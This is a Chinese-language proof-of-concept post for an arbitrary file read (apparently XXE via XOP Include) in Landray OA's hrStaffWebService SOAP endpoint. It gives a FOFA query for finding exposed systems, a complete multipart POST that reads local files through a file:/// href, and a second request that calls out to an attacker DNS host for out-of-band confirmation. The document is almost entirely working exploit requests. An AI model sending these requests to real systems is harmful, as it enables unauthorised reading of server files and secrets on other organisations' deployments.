蓝凌OA /sys/webservice/hrStaffWebService存在任意文件读取漏洞

蓝凌OA /sys/webservice/hrStaffWebService接口处存在任意文件读取漏洞

FOFA

app="Landray-OA系统"

POC

• 文件读取

POST /sys/webservice/hrStaffWebService HTTP/1.1
Host: 
Content-Type: multipart/related; boundary=----j0ofrwsv2dtllbzzkyh9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36
Content-Length: 619
Connection: close

------j0ofrwsv2dtllbzzkyh9
Content-Disposition: form-data; name="1"

<soapenv:Envelope xmlns:soapenv="" xmlns:web="http://webservice.staff.hr.kmss.landray.com/">
<soapenv:Header>
<soapenv:Body>
    <web:getHrStaffElements>
        <arg0>
            <beginTimeStamp>1</beginTimeStamp>
            <count><xop:Include xmlns:xop="http://www.w3.org/2004/08/xop/include" href="file:///"></xop:Include></count>
        </arg0>
    </web:getHrStaffElements>
</soapenv:Body>
</soapenv:Header>
</soapenv:Envelope>
------j0ofrwsv2dtllbzzkyh9--

• DNS带外
  因为这个漏洞第一眼就觉得是XXE漏洞，然后就测试了下XXE的DNS带外的方式。

POST /sys/webservice/hrStaffWebService HTTP/1.1
Host: 
Content-Type: multipart/related; boundary=----j0ofrwsv2dtllbzzkyh9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36
Content-Length: 598
Connection: close
SOAPAction: ""

------j0ofrwsv2dtllbzzkyh9
Content-Disposition: form-data; name="1"

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://webservice.staff.hr.kmss.landray.com/">
<soapenv:Header>
<soapenv:Body>
    <web:getHrStaffElements>
        <arg0>
            <beginTimeStamp>1</beginTimeStamp>
            <count><xop:Include xmlns:xop="http://www.w3.org/2004/08/xop/include" href="http://dns网址"></xop:Include></count>
        </arg0>
    </web:getHrStaffElements>
</soapenv:Body>
</soapenv:Header>
</soapenv:Envelope>
------j0ofrwsv2dtllbzzkyh9--